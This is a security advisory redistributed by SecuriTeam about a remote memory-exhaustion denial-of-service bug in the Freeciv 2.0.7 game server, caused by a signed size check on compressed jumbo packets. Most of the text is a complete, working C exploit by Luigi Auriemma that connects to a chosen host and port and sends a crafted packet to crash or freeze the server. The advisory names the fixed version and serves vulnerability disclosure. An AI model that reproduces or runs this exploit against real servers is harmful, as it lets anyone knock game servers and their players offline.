[NEWS] Freeciv Resource Starvation

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Freeciv Resource Starvation
------------------------------------------------------------------------


SUMMARY

 <http://www.freeciv.org> Freeciv is "an open source clone of the well 
known Civilization game. The game supports also online gaming through its 
own metaserver (which can be seen also on the web) and GGZ". A remotely 
exploitable vulnerability in Freeciv allows remote attackers to cause the 
Freeciv to starve the computer from its memory resource.

DETAILS

Vulnerable Systems:
 * Freeciv version 2.0.7

Immune Systems:
 * Freeciv version 2.0.8

Freeciv supports both plain and compressed data (administrators can 
disable this feature only recompiling the server from the source code with 
USE_COMPRESSION undefined). When the server receives a jumbo data (size 
set to 0xffff) it reads the subsequent 32 bits number which identifies the 
size of the compressed data.

Then it makes a signed comparison to know if the compressed size is major 
than the data received, if the client uses a negative compressed size 
value it will be able to elude this check. After having subtracted 6 bytes 
(header size) from this number the server tries to allocate the memory 
needed for decompressing the data which is fixed to 100 times this size. 
If the memory cannot be allocated the server terminates or freezes showing 
an out of memory message.

Exploit:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif



#define VER             "0.1"
#define PORT            5555
#define JUMBO_SIZE      0xffff



u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u_int   boomsz;
    int     sd,
            i;
    u_short port = PORT;
    u_char  buff[6];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    srand(time(NULL));
    setbuf(stdout, NULL);

    fputs("\n"
        "Freeciv <= 2.0.7 jumbo malloc crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n";
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    printf("- connect...");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf(" done\n");

    boomsz = 6 + (rand() * 1234);
    for(;;) {
        if(!boomsz) boomsz++;
        if(boomsz > 0) boomsz = -boomsz;
        if((u_int)((boomsz - 6) * 100) > 0x7fffffff) break;
        boomsz *= 1234;     // more than 2 gigabytes, I want to be sure
    }

    *(u_short *)buff     = JUMBO_SIZE;
    *(u_int *)(buff + 2) = htonl(boomsz);

    //  int compressed_size = whole_packet_len - header_size;   // 
header_size = 6
    //  long int decompressed_size = 100 * compressed_size;

    printf("- send BOOM data (try to allocate %u bytes on the remote 
system)\n",
        (u_int)(ntohl(*(u_int *)(buff + 2)) - 6) * 100);
    if(send(sd, buff, 6, 0)
      < 0) std_err();

    printf("- wait some seconds:\n");
    for(i = 3; i >= 0; i--) {
        printf("%3d\r", i);
        sleep(ONESEC);
    }

    close(sd);
    printf(
        "- the server should be crashed or freezed, check it manually\n"
        "  if it's still online retry again with this tool or the server 
is patched\n"
        "\n");
    return(0);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


ADDITIONAL INFORMATION

The information has been provided by  <mailto:aluigi@autistici.org> Luigi 
Auriemma.
The original article can be found at:  
<http://aluigi.altervista.org/adv/freecivdos-adv.txt> 
http://aluigi.altervista.org/adv/freecivdos-adv.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.